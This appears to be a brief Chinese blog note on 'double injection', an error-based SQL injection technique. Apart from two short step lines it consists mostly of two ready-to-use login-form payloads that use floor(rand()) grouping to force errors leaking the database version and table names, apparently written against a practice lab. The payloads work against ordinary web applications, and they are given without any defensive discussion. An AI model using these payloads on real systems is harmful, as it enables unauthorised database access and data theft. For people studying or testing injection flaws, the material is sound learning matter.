sql注入-双注入
1、判断存在注入,注入方式
2、报错、不报错


union select 无法回显

uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),version())%23&passwd=123456&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))%23&passwd=123456&submit=Submit

感谢支持

浙公网安备 33010602011771号